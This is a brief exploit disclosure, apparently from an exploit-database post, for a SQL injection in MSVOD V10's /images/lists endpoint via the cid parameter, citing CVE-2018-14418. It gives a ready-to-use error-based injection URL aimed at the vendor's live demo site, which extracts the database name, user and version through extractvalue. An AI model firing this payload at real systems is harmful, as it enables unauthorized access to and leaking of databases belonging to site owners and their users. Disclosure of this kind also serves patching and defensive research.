MSVOD V10 – SQL Injection

MSVOD V10 – SQL Injection via /images/lists

The $cid parameter controllable.

Open the page:/images/lists?cid=’

Then SQL will be error:

And we can see that Error SQL  Statement:

So Final Payload:

Official demo:

http://px.msvodx.com/images/lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20–%20

CVE:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14418

Exploit-DB:https://www.exploit-db.com/exploits/45062/